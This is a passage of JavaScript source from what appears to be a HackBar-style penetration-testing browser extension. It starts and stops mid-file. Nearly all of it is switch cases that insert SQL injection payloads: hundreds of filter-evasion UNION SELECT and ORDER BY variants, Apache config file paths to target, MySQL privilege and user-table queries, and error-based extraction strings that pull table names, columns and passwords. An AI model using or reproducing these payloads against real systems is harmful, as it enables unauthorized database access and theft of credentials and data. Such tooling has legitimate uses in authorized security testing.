1169.           break;
1170.             case '442':
1171.             txt = " having 1=2";
1172.           break;
1173.             case '443':
1174.             txt = " having 1=0";
1175.           break;
1176.             case '444':
1177.             txt = " having =1";
1178.           break;
1179.             case '445':
1180.             txt = " having null";
1181.           break;
1182.             case '446':
1183.             txt = " div 0";
1184.           break;
1185.             case '447':
1186.             txt = " div 1";
1187.           break;
1188.             case '448':
1189.             txt = " div 2";
1190.           break;
1191.             case '449':
1192.             txt = " div 3";
1193.           break;
1194.             case '450':
1195.             txt = " is null";
1196.           break;
1197.             case '451':
1198.             txt = " is not null";
1199.           break;
1200.             case '452':
1201.             txt = "limit 2,1";
1202.           break;
1203.             case '453':
1204.             txt = "limit 0,1";
1205.           break;
1206.             case '454':
1207.             txt = ") order by 1-- -";
1208.           break;
1209.             case '455':
1210.             txt = "') order by 1-- -";
1211.           break;
1212.             case '456':
1213.             txt = "')order by 1%23%23";
1214.           break;
1215.             case '457':
1216.             txt = "%')order by 1%23%23";
1217.           break;
1218.             case '458':
1219.             txt = "Null' order by 100--+";
1220.           break;
1221.             case '459':
1222.             txt = "Null' order by 9999--+";
1223.           break;
1224.             case '460':
1225.             txt = "')group by 99-- -";
1226.           break;
1227.             case '461':
1228.             txt = "'group by 119449-- -";
1229.           break;
1230.             case '462':
1231.             txt = "'group/**/by/**/99%23%23";
1232.           break;
1233.             case '463':
1234.             txt = "/*!ORDER BY*/";
1235.           break;
1236.             case '464':
1237.             txt = "/*!50000ORDER BY*/";
1238.           break;
1239.             case '465':
1240.             txt = "/**/ORDER/**/BY/**/";
1241.           break;
1242.             case '466':
1243.             txt = "/*!order*/+/*!by*/";
1244.           break;
1245.             case '467':
1246.             txt = "/*!50000ORDER*//**//*!50000BY*/";
1247.           break;
1248.             case '468':
1249.             txt = "/*!12345ORDER*/+/*!BY*/";
1250.           break;
1251.             case '469':
1252.             txt = "+ORDER%0aBY+";
1253.           break;
1254.             case '470':
1255.             txt = "+ORDER%0dBY+";
1256.           break;
1257.             case '471':
1258.             txt = "+ORDER%0a%0aBY+";
1259.           break;
1260.             case '472':
1261.             txt = "+ORDER%0d%0dBY+";
1262.           break;
1263.             case '473':
1264.             txt = "+ORDER%23BY+";
1265.           break;
1266.             case '474':
1267.             txt = "%ORDER%0abY%0a";
1268.           break;
1269.            case '475':
1270.             txt = "/*!UnIoN*/SeLecT+";
1271.           break;
1272.            case '476':
1273.             txt = "/*!union*/+/*!select*/";
1274.           break;
1275.            case '477':
1276.             txt = "union+/*!select*/";
1277.           break;
1278.            case '478':
1279.             txt = "uNiOn aLl sElEcT";
1280.           break;
1281.            case '479':
1282.             txt = "UNIunionON+SELselectECT";
1283.           break;
1284.            case '480':
1285.             txt = "/**/union/*!50000select*//**/";
1286.           break;
1287.            case '481':
1288.             txt = "0%a0union%a0select%09";
1289.           break;
1290.            case '482':
1291.             txt = "%0Aunion%0Aselect%0A";
1292.           break;
1293.            case '483':
1294.             txt = "%55nion/**/%53elect";
1295.           break;
1296.            case '484':
1297.             txt = "/*!uNIOn*/ /*!SelECt*/";
1298.           break;
1299.            case '485':
1300.             txt = "/**/union/**/select/**/";
1301.           break;
1302.            case '486':
1303.             txt = "/**/uNIon/**/sEleCt/**/";
1304.           break;
1305.            case '487':
1306.             txt = "+%2F**/+Union/*!select*/";
1307.           break;
1308.            case '488':
1309.             txt = "/**//*!union*//**//*!select*//**/";
1310.           break;
1311.            case '489':
1312.             txt = "+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+";
1313.           break;
1314.            case '490':
1315.             txt = "/**//*!50000UNION SELECT*//**/";
1316.           break;
1317.            case '491':
1318.             txt = "/**//*!12345UNION SELECT*//**/";
1319.           break;
1320.            case '492':
1321.             txt = "+union+distinctROW+select+";
1322.           break;
1323.            case '493':
1324.             txt = "+union+distinct+select+";
1325.           break;
1326.            case '494':
1327.             txt = "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A";
1328.           break;
1329.            case '495':
1330.             txt = "+UNunionION+SEselectLECT+";
1331.           break;
1332.            case '496':
1333.             txt = "+union+distinct+select+";
1334.           break;
1335.            case '497':
1336.             txt = "union /*!50000%53elect*/";
1337.           break;
1338.            case '498':
1339.             txt = "%55nion %53elect";
1340.           break;
1341.            case '499':
1342.             txt = "+--+Union+--+Select+--+";
1343.           break;
1344.            case '500':
1345.             txt = "+UnIoN/*&a=*/SeLeCT/*&a=*/";
1346.           break;
1347.            case '501':
1348.             txt = "uNioN (/*!/**/ SeleCT */ )";
1349.           break;
1350.            case '502':
1351.             txt = "uNiOn aLl sElEcT";
1352.           break;
1353.            case '503':
1354.             txt = "+uUNIONnion all sSELECTelect+";
1355.           break;
1356.            case '504':
1357.             txt = "+union+distinctROW+select+";
1358.           break;
1359.            case '505':
1360.             txt = "/*!00000Union*/ /*!00000Select*/";
1361.           break;
1362.            case '506':
1363.             txt = "/*!50000%55nIoN*/ /*!50000%53eLeCt*/";
1364.           break;
1365.            case '507':
1366.             txt = "%55nion %53elect";
1367.           break;
1368.            case '508':
1369.             txt = "+union+distinct+select+";
1370.           break;
1371.            case '509':
1372.             txt = "+union+distinctROW+select+";
1373.           break;
1374.            case '510':
1375.             txt = "/**//*!12345UNION SELECT*//**/";
1376.           break;
1377.            case '511':
1378.             txt = "/**//*!50000UNION SELECT*//**/";
1379.           break;
1380.            case '512':
1381.             txt = "/**/UNION/**//*!50000SELECT*//**/";
1382.           break;
1383.            case '513':
1384.             txt = "/*!50000UniON SeLeCt*/";
1385.           break;
1386.            case '514':
1387.             txt = "union /*!50000%53elect*/";
1388.           break;
1389.            case '515':
1390.             txt = "+ #?uNiOn + #?sEleCt";
1391.           break;
1392.            case '516':
1393.             txt = "+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt";
1394.           break;
1395.            case '517':
1396.             txt = "/*!%55NiOn*/ /*!%53eLEct*/";
1397.           break;
1398.            case '518':
1399.             txt = "/*!u%6eion*/ /*!se%6cect*/";
1400.           break;
1401.            case '519':
1402.             txt = "+un/**/ion+se/**/lect";
1403.           break;
1404.            case '520':
1405.             txt = "uni%0bon+se%0blect";
1406.           break;
1407.            case '521':
1408.             txt = "%2f**%2funion%2f**%2fselect";
1409.           break;
1410.            case '522':
1411.             txt = "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A";
1412.           break;
1413.            case '523':
1414.             txt = "REVERSE(noinu)+REVERSE(tceles)";
1415.           break;
1416.            case '524':
1417.             txt = "/*--*/union/*--*/select/*--*/";
1418.           break;
1419.            case '525':
1420.             txt = "union (/*!/**/ SeleCT */)";
1421.           break;
1422.            case '526':
1423.             txt = "uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/";
1424.           break;
1425.            case '527':
1426.             txt = "%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/";
1427.           break;
1428.            case '528':
1429.             txt = "%0A%09UNION%0CSELECT%10NULL%";
1430.           break;
1431.            case '529':
1432.             txt = "/*!union*//*--*//*!all*//*--*//*!select*/";
1433.           break;
1434.            case '530':
1435.             txt = "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C";
1436.           break;
1437.            case '531':
1438.             txt = "/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/";
1439.           break;
1440.            case '532':
1441.             txt = "+UnIoN/*&a=*/SeLeCT/*&a=*/";
1442.           break;
1443.            case '533':
1444.             txt = "union+sel%0bect";
1445.           break;
1446.            case '534':
1447.             txt = "+uni*on+sel*ect+";
1448.           break;
1449.            case '535':
1450.             txt = "+#1q%0Aunion all#qa%0A#%0Aselect";
1451.           break;
1452.            case '536':
1453.             txt = "UNION(SELECT(column)FROM(table))";
1454.           break;
1455.            case '537':
1456.             txt = "%23akb%0AUnIOn%23akb%0ASeLecT+";
1457.           break;
1458.            case '538':
1459.             txt = "%23akb%0A%55nIOn%23akb%0A%53eLecT+";
1460.           break;
1461.            case '539':
1462.             txt = "+#1q%0AuNiOn all#qa%0A#%0AsEleCt";
1463.           break;
1464.            case '540':
1465.             txt = "/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/";
1466.           break;
1467.            case '541':
1468.             txt = "%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/";
1469.           break;
1470.            case '542':
1471.             txt = "+%23faaaabihaaaa%0AUnIOn%23fabiha ha%0ASeLecT+";
1472.           break;
1473.            case '543':
1474.             txt = "+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C";
1475.           break;
1476.            case '544':
1477.             txt = "/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/";
1478.           break;
1479.            case '545':
1480.             txt = "+%23fabihafabihafabiha%0aUnIOn%23fabihafabihafabiha%0aSeLe cT+";
1481.           break;
1482.            case '546':
1483.             txt = "/*!fabihafabihafabiha%0d%0aunion*/+/*!fabihafabihafabiha%0d%0aSelEct*/";
1484.           break;
1485.            case '547':
1486.             txt = "/union\sselect/g";
1487.           break;
1488.            case '548':
1489.             txt = "/union\s+select/i";
1490.           break;
1491.            case '549':
1492.             txt = "/*!UnIoN*/SeLeCT";
1493.           break;
1494.            case '550':
1495.             txt = "+UnIoN/*&a=*/SeLeCT/*&a=*/";
1496.           break;
1497.            case '551':
1498.             txt = "+uni>on+sel>ect+";
1499.           break;
1500.            case '552':
1501.             txt = "+(UnIoN)+(SelECT)+";
1502.           break;
1503.            case '553':
1504.             txt = "+(UnI)(oN)+(SeL)(EcT)+";
1505.           break;
1506.            case '554':
1507.             txt = "+uni on+sel ect+";
1508.           break;
1509.            case '555':
1510.             txt = "+/*!UnIoN*/+/*!SeLeCt*/+";
1511.           break;
1512.            case '556':
1513.             txt = "/*!u%6eion*/ /*!se%6cect*/";
1514.           break;
1515.            case '557':
1516.             txt = "uni%20union%20/*!select*/%20";
1517.           break;
1518.            case '558':
1519.             txt = "union%23aa%0Aselect";
1520.           break;
1521.            case '559':
1522.             txt = "/**/union/*!50000select*/";
1523.           break;
1524.            case '560':
1525.             txt = "/^.*union.*$/ /^.*select.*$/";
1526.           break;
1527.            case '561':
1528.             txt = "/*union*/union/*select*/select+";
1529.           break;
1530.            case '562':
1531.             txt = "/*uni X on*/union/*sel X ect*/";
1532.           break;
1533.            case '563':
1534.             txt = "+un/**/ion+sel/**/ect+";
1535.           break;
1536.            case '564':
1537.             txt = "+UnIOn%0d%0aSeleCt%0d%0a";
1538.           break;
1539.            case '565':
1540.             txt = "UNION/*&test=1*/SELECT/*&pwn=2*/";
1541.           break;
1542.            case '566':
1543.             txt = "un?<ion sel="">+un/**/ion+se/**/lect+";
1544.           break;
1545.            case '567':
1546.             txt = "+(%55%6e%49%6f%4e)+(SelECT)+";
1547.           break;
1548.            case '568':
1549.             txt = "+uni%0bon+se%0blect+";
1550.           break;
1551.            case '569':
1552.             txt = "%252f%252a*/union%252f%252a /select%252f%252a*/";
1553.           break;
1554.            case '570':
1555.             txt = "/%2A%2A/union/%2A%2A/select/%2A%2A/";
1556.           break;
1557.            case '571':
1558.             txt = "%2f**%2funion%2f**%2fselect%2f**%2f";
1559.           break;
1560.            case '572':
1561.             txt = "+/*!u%6eion*/+/*!se%6cect*/+";
1562.           break;
1563.            case '573':
1564.             txt = "/**/uniUNIONon/**/aALLll/**/selSELECTect/**/";
1565.           break;
1566.            case '574':
1567.             txt = "/*!50000%55nIoN*/+/*!50000%53eLeCt*/";
1568.           break;
1569.            case '575':
1570.             txt = "id=1+’UnI”On’+'SeL”ECT’";
1571.           break;
1572.            case '576':
1573.             txt = "id=1+'UnI'||'on'+SeLeCT'";
1574.           break;
1575.            case '577':
1576.             txt = "%55nion(%53elect 1,2,3,...100)";
1577.           break;
1578.            case '578':
1579.             txt = "union(select (1),(2),(3),...(10))";
1580.           break;
1581.            case '579':
1582.             txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()";
1583.           break;
1584.            case '580':
1585.             txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()";
1586.           break;
1587.            case '581':
1588.             txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()";
1589.           break;
1590.            case '582':
1591.             txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()";
1592.           break;
1593.            case '583':
1594.             txt = "/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table";
1595.           break;
1596.            case '584':
1597.             txt = "/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table";
1598.           break;
1599.            case '585':
1600.             txt = "CON%08CAT()";
1601.           break;
1602.            case '586':
1603.             txt = "CoNcAt()";
1604.           break;
1605.            case '587':
1606.             txt = "%0AcOnCat()";
1607.           break;
1608.            case '588':
1609.             txt = "/**//*!12345cOnCat*/";
1610.           break;
1611.            case '589':
1612.             txt = "/*!50000cOnCat*/(/*!*/)";
1613.           break;
1614.            case '590':
1615.             txt = "unhex(hex(concat(table_name)))";
1616.           break;
1617.            case '591':
1618.             txt = "unhex(hex(/*!12345concat*/(table_name)))";
1619.           break;
1620.            case '592':
1621.             txt = "unhex(hex(/*!50000concat*/(table_name)))";
1622.           break;
1623.            case '593':
1624.             txt = "/*!12345group_concat*/(/*!12345table_name*/)";
1625.           break;
1626.            case '594':
1627.             txt = "/*!50000group_concat*/(/*!50000table_name*/)";
1628.           break;
1629.            case '595':
1630.             txt = "/*!GrOuP_ConCaT*/()";
1631.           break;
1632.            case '596':
1633.             txt = "/*!12345GroUP_ConCat*/()";
1634.           break;
1635.            case '597':
1636.             txt = "/*!50000gRouP_cOnCaT*/()";
1637.           break;
1638.            case '598':
1639.             txt = "/*!50000Gr%6fuP_c%6fnCAT*/()";
1640.           break;
1641.            case '599':
1642.             txt = "/*!group_concat*/()";
1643.           break;
1644.            case '600':
1645.             txt = "gRoUp_cOnCAt()";
1646.           break;
1647.            case '601':
1648.             txt = "group_concat(/*!*/)";
1649.           break;
1650.            case '602':
1651.             txt = "group_concat(/*!12345table_name*/)";
1652.           break;
1653.            case '603':
1654.             txt = "group_concat(/*!50000table_name*/)";
1655.           break;
1656.            case '603':
1657.             txt = "group_concat(/*!50000table_name*/)";
1658.           break;
1659.            case '605':
1660.             txt = "/*!group_concat*/(/*!50000table_name*/)";
1661.           break;
1662.            case '606':
1663.             txt = "unhex(hex(group_concat(table_name)))";
1664.           break;
1665.            case '607':
1666.             txt = "unhex(hex(/*!group_concat*/(/*!table_name*/)))";
1667.           break;
1668.            case '608':
1669.             txt = "unhex(hex(/*!12345group_concat*/(table_name)))";
1670.           break;
1671.            case '609':
1672.             txt = "unhex(hex(/*!12345group_concat*/(/*!table_name*/)))";
1673.           break;
1674.            case '610':
1675.             txt = "unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))";
1676.           break;
1677.            case '611':
1678.             txt = "unhex(hex(/*!50000group_concat*/(table_name)))";
1679.           break;
1680.            case '612':
1681.             txt = "unhex(hex(/*!50000group_concat*/(/*!table_name*/)))";
1682.           break;
1683.            case '613':
1684.             txt = "unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))";
1685.           break;
1686.            case '614':
1687.             txt = "CONVERT(group_concat(table_name)+USING+latin1)";
1688.           break;
1689.            case '615':
1690.             txt = "CONVERT(group_concat(table_name)+USING+latin2)";
1691.           break;
1692.            case '616':
1693.             txt = "CONVERT(group_concat(table_name)+USING+latin3)";
1694.           break;
1695.            case '617':
1696.             txt = "CONVERT(group_concat(table_name)+USING+latin4)";
1697.           break;
1698.            case '618':
1699.             txt = "CONVERT(group_concat(table_name)+USING+latin5)";
1700.           break;
1701.            case '619':
1702.             txt = "convert(group_concat(table_name)+using+ascii)";
1703.           break;
1704.            case '620':
1705.             txt = "convert(group_concat(/*!table_name*/)+using+ascii)";
1706.           break;
1707.            case '632':
1708.             txt = "convert(group_concat(/*!12345table_name*/)+using+ascii)";
1709.           break;
1710.            case '622':
1711.             txt = "convert(group_concat(/*!50000table_name*/)+using+ascii)";
1712.           break;
1713.  
1714.         }      
1715.         hackBar.setSelectedText( txt );
1716.       },
1717.  
1718.  
1719.         /* PESCYTE STATEMENTS FUNCTION */
1720.       statementspescyte: function (choice)  {
1721.     var str = choice;
1722.     switch (str){
1723.       /*LINUX DIR*/
1724.       case '1':
1725.             txt = "/var/www/html/";
1726.           break;
1727.       case '2':
1728.             txt = "/var/www/web1/html/";
1729.           break;
1730.       case '3':
1731.             txt = "/var/www/sitename/htdocs/";
1732.           break;
1733.       case '4':
1734.             txt = "/var/www/localhost/htdocs";
1735.           break;
1736.       case '5':
1737.             txt = "/var/www/vhosts/sitename/httpdocs/";
1738.           break;
1739.       case '6':
1740.             txt = "/etc/init.d/apache2";
1741.           break;
1742.       case '7':
1743.             txt = "/etc/httpd/httpd.conf";
1744.           break;
1745.       case '8':
1746.             txt = "/etc/apache/apache.conf";
1747.           break;
1748.       case '9':
1749.             txt = "/etc/apache/httpd.conf";
1750.           break;
1751.       case '10':
1752.             txt = "/etc/apache2/apache2.conf";
1753.           break;
1754.       case '11':
1755.             txt = "/etc/apache2/httpd.conf";
1756.           break;
1757.       case '12':
1758.             txt = "/usr/local/apache2/conf/httpd.conf";
1759.           break;
1760.       case '13':
1761.             txt = "/usr/local/apache/conf/httpd.conf";
1762.           break;
1763.       case '14':
1764.             txt = "/opt/apache/conf/httpd.conf";
1765.           break;
1766.       case '15':
1767.             txt = "/home/apache/httpd.conf";
1768.           break;
1769.       case '16':
1770.             txt = "/home/apache/conf/httpd.conf";
1771.           break;
1772.       case '17':
1773.             txt = "/etc/apache2/sites-available/default";
1774.           break;
1775.       case '18':
1776.             txt = "/etc/apache2/vhosts.d/default_vhost.include";
1777.           break;
1778.       case '19':
1779.             txt = "/templates_compiled/";
1780.           break;
1781.       case '20':
1782.             txt = "/templates_c/";
1783.           break;
1784.       case '21':
1785.             txt = "/temporary/";
1786.           break;
1787.       case '22':
1788.             txt = "/images/";
1789.           break;
1790.       case '23':
1791.             txt = "/files/";
1792.           break;
1793.       case '24':
1794.             txt = "/temp/";
1795.           break;
1796.       case '25':
1797.             txt = "/etc/httpd/conf/httpd.conf";
1798.           break;
1799.       /*WINDOWS DIR*/
1800.       case '26':
1801.             txt = "C:/XAMPP/apache/conf/extra/httpd-vhost.conf";
1802.           break;
1803.       case '27':
1804.             txt = "C:/AppServ/Apache2.2/conf/extra/httpd-vhosts.conf";
1805.           break;
1806.       case '28':
1807.             txt = "C:/xampp/apache/conf/httpd.conf";
1808.           break;
1809.       case '29':
1810.             txt = "C:/AppServ/Apache2.2/conf/httpd.conf";
1811.           break;
1812.       case '30':
1813.             txt = "C:/wamp/bin/apache/apache2.4.9/conf/extra/httpd-vhosts.conf";
1814.           break;
1815.       case '31':
1816.             txt = "C:/wamp/bin/apache/Apache2.2.11/conf/extra/httpd-vhosts.conf";
1817.           break;
1818.       case '32':
1819.             txt = "C:/Program Files/Ampps/apache/conf/extra/httpd-vhosts.conf";
1820.           break;
1821.       case '33':
1822.             txt = "C:/Program Files (x86)/Ampps/apache/conf/extra/httpd-vhosts.conf";
1823.           break;
1824.     }    
1825.     hackBar.setSelectedText( txt );
1826.     },
1827.  
1828.       /* SYS VARIABLES */
1829.       SysVariables: function (choice)   {
1830.         var str = choice;
1831.         switch (str){
1832.             // VERSION
1833.             case '1': txt = "@@VERSION";
1834.                     break;
1835.             case '2': txt = "VERSION()";
1836.                     break;
1837.             case '3': txt = "@@GLOBAL.VERSION";
1838.                     break;         
1839.             // USER
1840.             case '5': txt = "USER()";
1841.                     break;
1842.             case '6': txt = "CURRENT_USER()";
1843.                     break;
1844.             case '7': txt = "SYSTEM_USER()";
1845.                     break;
1846.             case '8': txt = "SESSION_USER()";
1847.                     break;
1848.             case '9': txt = "SUBSTRING_INDEX(USER(),0x40,1)";
1849.                     break;
1850.             case '10': txt = "(SELECT+CONCAT(USER)+FROM+INFORMATION_SCHEMA.PROCESSLIST)";
1851.                     break;                 
1852.             // DATABASE
1853.             case '11': txt = "DATABASE()";
1854.                     break;
1855.             case '12': txt = "SCHEMA()";
1856.                     break;
1857.             case '12.1': txt = "(SELECT+CONCAT(DB)+FROM+INFORMATION_SCHEMA.PROCESSLIST)";
1858.                     break;
1859.             // OTHER MySQL
1860.             case '13': txt = "@@HOSTNAME";
1861.                     break;
1862.             case '14': txt = "@@VERSION_COMPILE_MACHINE";
1863.                     break;
1864.             case '15': txt = "@@VERSION_COMPILE_OS";
1865.                     break;
1866.             case '16': txt = "@@BASEDIR";
1867.                     break;
1868.             case '17': txt = "@@DATADIR";
1869.                     break;
1870.             case '18': txt = "@@HAVE_OPENSSL";
1871.                     break;
1872.             case '19': txt = "@@WAIT_TIMEOUT";
1873.                     break;
1874.             case '20': txt = "@@MYISAM_RECOVER_OPTIONS";
1875.                     break;
1876.             case '21': txt = "@@HAVE_INNODB";
1877.                     break;
1878.             case '22': txt = "@@HAVE_SYMLINK";
1879.                     break;
1880.             case '23': txt = "@@CHARACTER_SET_CONNECTION";
1881.                     break;
1882.             case '24': txt = "@@CHARACTER_SET_CLIENT";
1883.                     break;
1884.             case '25': txt = "@@CHARACTER_SET_FILESYSTEM";
1885.                     break;
1886.             case '26': txt = "@@FT_BOOLEAN_SYNTAX";
1887.                     break;
1888.             // INFO
1889.             case '27': txt = "(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)";
1890.                     break;
1891.             case '28': txt = "(SELECT+GROUP_CONCAT(user,0x202d3e20,file_priv,0x3c62723e)+FROM+mysql.user)";
1892.                     break;
1893.             case '29': txt = "(SELECT+CONCAT(info)+FROM+INFORMATION_SCHEMA.PROCESSLIST)";
1894.                     break;                 
1895.             case '30': txt = "@@CHARACTER_SET_SERVER";
1896.                     break;
1897.             case '31': txt = "@@CHARACTER_SET_DATABASE";
1898.                     break;
1899.             case '32': txt = "@@CHARACTER_SETS_DIR";
1900.                     break;
1901.             case '33': txt = "@@COLLATION_CONNECTION";
1902.                     break;
1903.             case '34': txt = "@@CONNECT_TIMEOUT";
1904.                     break;
1905.             case '35': txt = "@@LANGUAGE";
1906.                     break;
1907.             case '36': txt = "@@LOG_ERROR";
1908.                     break; 
1909.             case '37': txt = "IF((@@LOWER_CASE_FILE_SYSTEM)=0,0x594553,0x4e4f)";
1910.                     break;
1911.             case '38': txt = "IF((@@LOWER_CASE_TABLE_NAMES)=0,0x594553,0x4e4f)";
1912.                     break;
1913.             case '39': txt = "@@PID_FILE";
1914.                     break;
1915.             case '40': txt = "@@PLUGIN_DIR";
1916.                     break;
1917.             case '41': txt = "@@PORT";
1918.                     break;
1919.             case '42': txt = "@@SOCKET";
1920.                     break;
1921.             case '43': txt = "@@SLAVE_LOAD_TMPDIR";
1922.                     break;
1923.             case '44': txt = "@@VERSION_COMMENT";
1924.                     break;                 
1925.         }  
1926.         hackBar.setSelectedText( txt );
1927.       },
1928.       /* T.PRO CONVERSATION FUNCTIONS */
1929.       statementsCalcTpro: function (choice) {
1930.         var txt = hackBar.getSelectedText();
1931.         var str = choice;
1932.         switch (str){      
1933.             case '1':  txt = "";           
1934.                     break;
1935.             case '2': txt = "unhex(hex(" + txt + "))";
1936.                     break;
1937.             case '3': txt = "cast(" + txt + ")";           
1938.                     break;
1939.             case '4': txt = "uncompress(compress(" + txt + "))";           
1940.                     break;
1941.             default:
1942.                     txt = "ERROR";
1943.                     break;                 
1944.         }      
1945.         hackBar.setSelectedText( txt );
1946.       },
1947.       /* T.PRO COMMENT FUNCTION */
1948.       commentsTpro: function (choice)   {
1949.         var txt = hackBar.getSelectedText();               
1950.         var str = choice;
1951.         switch (str){
1952.             case '1': txt = txt.replace(/\/\*\*\//g, "+");
1953.                 txt = txt.replace(/\/\*\&a\=\*\//g, "+");          
1954.                 txt = txt.replace(/ /g, "+");
1955.                     break;
1956.             case '2': txt = txt.replace(/\+/g, "/**/");
1957.                 txt = txt.replace(/\/\*\&a\=\*\//g, "/**/");
1958.                 txt = txt.replace(/ /g, "/**/");
1959.                     break;
1960.             case '3': txt = txt.replace(/\+/g, " ");
1961.                 txt = txt.replace(/\/\*\*\//g, " ");
1962.                 txt = txt.replace(/ /g, " ");
1963.                     break;
1964.         }      
1965.         hackBar.setSelectedText( txt );
1966.     }, 
1967.     /* ERROR BASED FUNCTION */
1968.       ErrorBased: function (choice) {                      
1969.         var str = choice;
1970.         switch (str){        
1971.             case '1': txt = "+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1";
1972.                     break;      
1973.             case '2': txt = "+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)";
1974.                     break;        
1975.             case '3':
1976.                     var dbName = prompt("Database Name", "DATABASE()");
1977.                     var dbNameFinal = "0x";
1978.                     if(dbName == "DATABASE()"){dbNameFinal="DATABASE()";}
1979.                     else{        
1980.                         for (var i = 0; i < dbName.length; i++){
1981.                           dbNameFinal += dbName.charCodeAt(i).toString(16);
1982.                         }
1983.                     }
1984.                     txt = "+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=" + dbNameFinal + "+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)";
1985.                     break;          
1986.             case '4':
1987.                     var dbName = prompt("Database Name","DATABASE()");
1988.                     var dbNameFinal = "0x";
1989.                     if(dbName == "DATABASE()"){dbNameFinal="DATABASE()";}
1990.                     else{            
1991.                         for (var i = 0; i < dbName.length; i++){
1992.                           dbNameFinal += dbName.charCodeAt(i).toString(16);
1993.                         }
1994.                     }
1995.                     var tableName = prompt("Table Name", "users");                
1996.                     var tblNameHexed = '';
1997.                     for(var i=0;i<tableName.length;i++) {
1998.                         tblNameHexed += ''+tableName.charCodeAt(i).toString(16);
1999.                     }
2000.                     txt = "+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x" + tblNameHexed + "+AND+table_schema=" + dbNameFinal + "+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)";                    
2001.                     break;
2002.             case '5':
2003.                     var Db = prompt("Database Name","DATABASE()");
2004.                     var tableName = prompt("Table Name", "users");
2005.                     if(Db == ""){dbANDtable=tableName;}
2006.                     if(Db == "DATABASE()"){dbANDtable=tableName;}
2007.                     else{
2008.                     dbANDtable=Db + "." + tableName;                   
2009.                     }
2010.                     var columnName = prompt("Column Name", "password");
2011.                     txt = "+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(" + columnName + ")+AS+CHAR),0x7e))+FROM+" + dbANDtable + "+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)";
2012.                     break;
2013.             /*MOD's By r0ot@H3X49 Advance Error based*/
2014.             /*Error Based for MySQL Version < 5.5 */
2015.             case '6':
2016.                     txt = "+POLYGON((Select*from(Select*from(Select+@@version ``)y)x))";
2017.                     break;
2018.             case '7':
2019.                     txt = "+POLYGON((select*from(select*from(select+group_concat(table_name+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database())f)x))";
2020.                     break;
2021.             /*Error Based for MySQL Version 5.5 , 5.6 ...  / Maria_db*/
2022.             case '8':
2023.                     txt = "and(select!x-~0.+from(select(select+group_concat(Version()))x)x)";
2024.                     break;
2025.             case '9':
2026.                     txt = "and(select!x-~0.+from(select(select+group_concat(table_name+separator+0x0b)from+information_schema.tables+where+table_schema=database())x)x)";
2027.                     break;
2028.             /*DIOS By MadBlood for MySQL Version 5.5 , 5.6 ...  / Maria_db*/
2029.             case '10':
2030.                     txt = "(select+x*1E308+from(select+concat(@:=0,(select+count(*)from+information_schema.tables+where+table_schema=database()and@:=concat(@,0x0b,table_name)),@)x)y)";
2031.                     break;
2032.             case '11':
2033.                     txt = "(select(x+is+not+null)-9223372036854775808+from(select(concat(@:=0,(select+count(*)from+information_schema.tables+where+table_schema=database()and@:=concat(@,0x0b,table_name)),@))x)y)";
2034.                     break;
2035.             case '12':
2036.                     txt = "(select!x-~0+from(select+concat(@:=0,(select(count(*))from(information_schema.tables)where(table_schema=database())and@:=concat(@,0x0b,table_name)),@)x)y)";
2037.                     break;
2038.             case '13':
2039.                     txt = "(select+if(x,6,9)*1E308+from(select(select+group_concat(table_name+separator+0x0b)from+information_schema.tables+where+table_schema=database())x)x)";
2040.                     break;
2041.             case '14':
2042.                     txt = "(select!x-~0.+from(select(select+group_concat(table_name+separator+0x0b)from+information_schema.tables+where+table_schema=database())x)x)";
2043.                     break;
2044.             case '15':
